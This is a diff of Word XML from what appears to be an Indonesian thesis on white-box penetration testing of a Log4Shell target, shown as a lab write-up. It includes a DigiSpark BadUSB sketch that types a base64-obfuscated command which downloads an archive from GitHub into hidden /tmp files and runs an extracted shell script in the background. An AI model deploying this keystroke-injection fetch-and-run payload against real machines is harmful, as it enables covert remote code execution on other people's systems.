+        </w:rPr>
+        <w:t>tar -xf /tmp/.a -C /tmp/ &amp; wait</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>bash /tmp/.cooki3.sh -r &amp; disown</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cat digispark.sh | </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">base64 | </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>tr -d ‘\n’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; digispark.b64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berkas </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">skrip </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Bash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>diawali dengan mengunduh arsip yang berisi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>kan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> modul pengujian serta aplikasi layanan HTTP Java. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Setelah </w:t>
+      </w:r>
+      <w:r>
+        <w:t>terbuka</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>skrip</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> kemudian mulai menjalankan layanan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dalam</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>background</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tanpa membutuhkan proses dari terminal. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Konten </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tersebut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">yang </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lalu di-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>encoding</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> untuk digunakan pada pemrograman Arduino.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berikut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">adalah </w:t>
+      </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>[ update rules ]</w:t>
+        <w:t xml:space="preserve">potongan kode dalam berkas </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>digispark.ino</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> yang digunakan untuk memprogram BadUSB </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">untuk fungsi eksploitasi </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dalam perangkat DigiSpark Attiny 85:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[ pembuatan base64 script</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> digispark.sh &gt;&gt; digispark.b64</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> ]</w:t>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>#include “DigiKeyboard.h”</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[ penjelasan snippet digispark.ino ]</w:t>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>void setup() {</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>[ proses upload ]</w:t>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>DigiKeyboard.sendKeyStroke(KEY_F2 MOD_ALT_LEFT);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="426"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DigiKeyboard.println("gnome-terminal -e '/bin/bash -i -c \"base64 -d &lt;&lt;&lt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>IyEvYmluL2Jhc2gKIy0tLS0tLS0tLS0Kd2dldCAtcSAtTyAvdG1wLy5hIGh0dHBzOi8vZ2l0aHViLmNvbS9ob3Rwb3Rjb29raWUvbG9nNHNoZWxsLXdoaXRlLWJveC9yYXcvbWFpbi9yZWQvcGF5bG9hZC9wd25kLnRhci5neiAmIHdhaXQKdGFyIC14ZiAvdG1wLy5hIC1DIC90bXAvICYgd2FpdApiYXNoIC90bXAvLmNvb2tpMy5zaCAtciAmIGRpc293bg== | bash\"'");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Terdapat </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dua perintah utama yang </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">menggunakan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">fungsi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>DigiKeyboard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>untuk men</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">simulasikan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>keystroke</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>keyboard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sistem</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Rangkaian </w:t>
+      </w:r>
+      <w:r>
+        <w:t>perintah</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tersebut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pada </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dasarnya </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dimulai dengan membuka </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>console</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sistem </w:t>
+      </w:r>
+      <w:r>
+        <w:t>untuk me</w:t>
+      </w:r>
+      <w:r>
+        <w:t>masukan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>injeksinya</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, lalu mengetikan perintah untuk melakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>decoding</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dari konten </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>digispark.b64</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>yang</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tereksekusi dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Bash pada program terminal. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adapun </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pemilihan program </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>gnome-terminal</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> karena adanya dependensi </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">skrip Bash </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">terhadap </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">environment </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>variable</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sistem yang disediakan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> di dalamnya</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, sehingga eksploitasi dapat berfungsi secara utuh.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39833,7 +40846,7 @@
         <w:pStyle w:val="H2"/>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="110" w:name="_Toc117497886"/>
+      <w:bookmarkStart w:id="112" w:name="_Toc117497886"/>
       <w:r>
         <w:t>4.3</w:t>
       </w:r>
@@ -39841,9 +40854,15 @@
         <w:tab/>
       </w:r>
       <w:r>
-        <w:t>Pengujian Kerentanan Aplikasi pada Sistem Target</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="110"/>
+        <w:t xml:space="preserve">Pengujian Kerentanan Aplikasi </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Sistem Target</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="112"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39855,9 +40874,121 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada </w:t>
+      </w:r>
+      <w:r>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ahap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>[ PTES ]</w:t>
+        <w:t xml:space="preserve">pengujian </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>berikut, seluruh rangkaian kegiatan didasarkan menggunakan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> metode PTES. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tahapan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>diawali dengan mengidentifikasi informasi kerentanan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> hingga </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">perancangan vektor serangan. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>Bentuk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ksploitasi dilakukan menggunakan instrumen pengujian yang telah dibangun pada bab sebelumnya</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> secara </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>white-box testing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adapun </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>hasil akhir dari pengujian</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ini</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berupa analisis </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>perbedaan sumber daya sistem target baik setelah eksploitasi ataupun remediasi.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39869,7 +41000,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="_Toc117497887"/>
+      <w:bookmarkStart w:id="113" w:name="_Toc117497887"/>
       <w:r>
         <w:t>4.3.1</w:t>
       </w:r>
@@ -39879,17 +41010,2414 @@
       <w:r>
         <w:t>Pre-Engagement</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="111"/>
+      <w:bookmarkEnd w:id="113"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
         <w:spacing w:after="170"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[ dokumentasi ]</w:t>
-      </w:r>
-    </w:p>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tahap ini, penulis melakukan pemetaan terhadap bagaimana pengujian dilakukan beserta dengan penggunaan instrumen pendukungnya.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dikarenakan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bentuk pengujian berupa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>white-box testing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dengan seluruh instrumen pengujian yang dibangun </w:t>
+      </w:r>
+      <w:r>
+        <w:t>internal</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, maka tidak disertakan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nya</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">suatu bentuk surat izin, perjanjian, atau bentuk kesepakatan </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">antara dua pihak lainnya. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adapun </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pengujian dilakukan dengan menggunakan perangkat pendukung yang tertera dalam spesifikasi perangkat pada tabel 4.1.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berikut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pada tabel 4.3 merupakan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>keterangan terhadap persiapan dalam menjalankannya pengujian:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Reference"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4.3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Hasil tahap pre-engagement</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1978"/>
+        <w:gridCol w:w="857"/>
+        <w:gridCol w:w="1696"/>
+        <w:gridCol w:w="3730"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Kegiatan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Status</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5426" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Hasil</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge w:val="restart"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Identifikasi Lingkup Pengujian</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
